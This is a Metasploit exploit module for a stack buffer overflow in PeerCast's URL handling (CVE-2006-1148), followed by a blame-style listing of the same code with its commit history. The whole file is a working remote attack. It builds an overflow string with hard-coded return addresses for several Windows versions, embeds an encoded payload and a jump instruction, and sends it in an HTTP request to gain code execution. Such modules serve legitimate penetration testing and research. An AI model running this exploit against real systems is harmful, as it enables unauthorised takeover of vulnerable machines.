metasploit-framework/modules/exploits/windows/http/peercast_url.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PeerCast URL Handling Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in PeerCast <= v0.1216.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2006-1148'],
          ['OSVDB', '23777'],
          ['BID', '17040'],
          ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
          ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
          ['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
          ['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
        ],
      'DisclosureDate' => 'Mar 8 2006'))

    register_options( [ Opt::RPORT(7144) ], self.class )
  end

  def exploit
    connect

    pat = rand_text_alphanumeric(1024)
    pat[768, 4] = [target.ret].pack('V')
    pat[812, 5] = [0xe9, -517].pack('CV')
    pat[300, payload.encoded.length] = payload.encoded

    uri = '/stream/?' + pat

    res = "GET #{uri} HTTP/1.0\r\n\r\n"

    print_status("Trying target address 0x%.8x..." % target.ret)
    sock.put(res)
    sock.close

    handler
    disconnect
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 01:10:39 +01:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 18:47:33 +02:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 20:50:46 +02:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 01:10:39 +01:00			`##`

PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da 2006-03-30 23:05:42 +02:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 07:23:59 +02:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 23:28:54 +02:00			`Rank = AverageRanking`
PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da 2006-03-30 23:05:42 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`include Msf::Exploit::Remote::Tcp`
PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da 2006-03-30 23:05:42 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`def initialize(info = {})`
			`super(update_info(info,`
Add last chunk of fixes 2014-03-11 18:44:34 +01:00			`'Name' => 'PeerCast URL Handling Buffer Overflow',`
Retab modules 2013-08-30 23:28:54 +02:00			`'Description' => %q{`
			`This module exploits a stack buffer overflow in PeerCast <= v0.1216.`
			`The vulnerability is caused due to a boundary error within the`
			`handling of URL parameters.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2006-1148'],`
			`['OSVDB', '23777'],`
			`['BID', '17040'],`
			`['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],`
			`['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],`
			`['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],`
			`['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],`
			`],`
			`'DisclosureDate' => 'Mar 8 2006'))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`register_options( [ Opt::RPORT(7144) ], self.class )`
			`end`
PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da 2006-03-30 23:05:42 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`pat = rand_text_alphanumeric(1024)`
			`pat[768, 4] = [target.ret].pack('V')`
			`pat[812, 5] = [0xe9, -517].pack('CV')`
			`pat[300, payload.encoded.length] = payload.encoded`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`uri = '/stream/?' + pat`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`res = "GET #{uri} HTTP/1.0\r\n\r\n"`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`print_status("Trying target address 0x%.8x..." % target.ret)`
			`sock.put(res)`
			`sock.close`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 10:40:19 +02:00
Retab modules 2013-08-30 23:28:54 +02:00			`handler`
			`disconnect`
			`end`
PeerCast exploits git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da 2006-03-30 23:05:42 +02:00
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 18:02:24 +02:00			`end`